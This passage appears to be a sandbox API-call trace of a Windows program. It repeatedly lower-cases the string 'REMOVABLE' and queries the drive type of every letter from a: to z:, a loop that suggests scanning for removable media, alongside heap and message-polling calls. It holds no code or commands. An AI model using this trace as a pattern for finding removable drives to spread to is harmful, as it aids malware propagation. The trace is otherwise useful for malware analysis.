RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0212.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0212.343] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0212.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0212.343] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0212.343] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.344] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0212.344] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.344] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0212.344] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0212.344] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0212.344] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0212.344] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.344] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0212.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.344] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0212.344] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0212.345] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0212.345] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0212.345] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0212.346] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0212.346] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0212.346] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0212.346] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0212.346] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0212.347] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0212.347] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0212.347] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0212.347] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0212.348] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0212.348] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0212.348] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0212.348] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0212.348] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0212.348] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0212.349] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0212.349] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0212.349] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0212.349] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0212.349] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0212.349] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0212.350] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0212.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0212.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0212.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0212.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0212.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0212.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0212.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0212.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0212.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0212.350] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0212.351] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0212.351] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0212.351] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0212.351] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0212.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0212.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0212.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0212.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0212.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0212.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0212.351] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0212.351] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0212.351] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0212.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0212.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0212.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0212.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0212.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0212.352] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0212.352] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0212.352] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0212.352] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0212.352] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0212.352] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0212.352] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0212.352] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0212.352] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0212.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0212.353] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0212.353] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0212.353] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0212.353] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0212.353] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0212.353] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0212.353] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0212.354] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0212.354] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0212.354] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0212.354] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0212.354] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0212.354] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0212.355] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0212.355] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0212.355] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0212.355] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0212.356] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0212.356] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0212.356] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0212.356] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0212.356] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0212.357] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0212.357] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0212.357] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0212.357] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0212.358] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0212.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0212.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0212.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0212.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0212.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0212.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0212.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0212.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0212.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0212.358] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0212.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0212.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0212.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0212.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0212.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0212.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0212.359] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0212.359] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.359] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0212.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0212.360] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0212.360] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0212.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0212.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0212.360] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0212.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0212.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0212.360] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0212.361] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0212.361] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0212.361] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0212.361] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0212.361] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0212.361] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0212.362] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0212.362] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0212.362] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0212.362] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0212.362] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0212.362] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0212.363] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0212.363] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0212.363] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0212.363] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0212.363] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0212.364] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0212.364] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0212.364] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0212.364] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0212.364] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0212.365] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0212.365] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0212.365] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0212.365] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0212.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0212.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.367] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0212.367] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.367] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.367] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0212.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0212.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0212.367] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0212.368] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0212.368] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0212.368] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.368] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0212.368] RtlAllocateHeap 